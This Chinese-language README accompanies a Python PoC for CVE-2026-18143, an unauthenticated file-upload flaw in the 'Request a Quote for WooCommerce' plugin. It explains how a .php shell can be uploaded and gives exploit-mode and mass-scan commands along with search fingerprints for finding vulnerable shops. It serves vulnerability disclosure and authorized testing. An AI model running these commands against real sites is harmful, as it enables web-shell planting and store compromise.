针对 Request a Quote for WooCommerce(woocommerce-request-a-quote,Addify / WooCommerce.com)中 CVE-2026-18143 的 Python 3 PoC。
CVE-2026-18143 — Request a Quote for WooCommerce ≤ 2.9.2 允许通过 afrfq_submit_quote_via_popup() 进行未认证任意文件上传(CWE-434,CVSS 9.8 严重)。该弹窗处理函数调用 move_uploaded_file() 时使用原始客户端文件名,未对扩展名或 MIME 进行白名单校验,并将文件写入可通过 Web 访问的临时 RFQ 上传目录。当公开报价规则使用多页弹窗流程时,攻击者可上传 .php shell。已在 > 2.9.2 中修复。
PoC 页面: https://pocbit.org/pocs/cve-2026-18143
| 产品 | Request a Quote for WooCommerce (Addify) |
| 插件路径 | wp-content/plugins/woocommerce-request-a-quote/ |
| 受影响版本 | ≤ 2.9.2 |
| AJAX | action=afrfq_submit_quote_via_popup → admin-ajax.php |
| 前提条件 | 商店前端已启用弹窗报价规则 |
pip install -r requirements.txt
python poc.py -u https://shop.example --mode check
python poc.py -u https://shop.example --mode check --upload-probe
python poc.py -u https://shop.example --mode exploit --nonce YOUR_NONCE --verify
python poc.py -u https://shop.example --mode exploit --page /shop/ --verify
python poc.py --list targets.example.txt --mode check -j 15
当报价弹窗处于活动状态时,Nonce 通常位于商店/产品页面的前端 JS(afrfq 本地化对象)中。
body="/wp-content/plugins/woocommerce-request-a-quote/"
body="afrfq"
仅限授权测试。--upload-probe / --mode exploit 会向目标写入文件。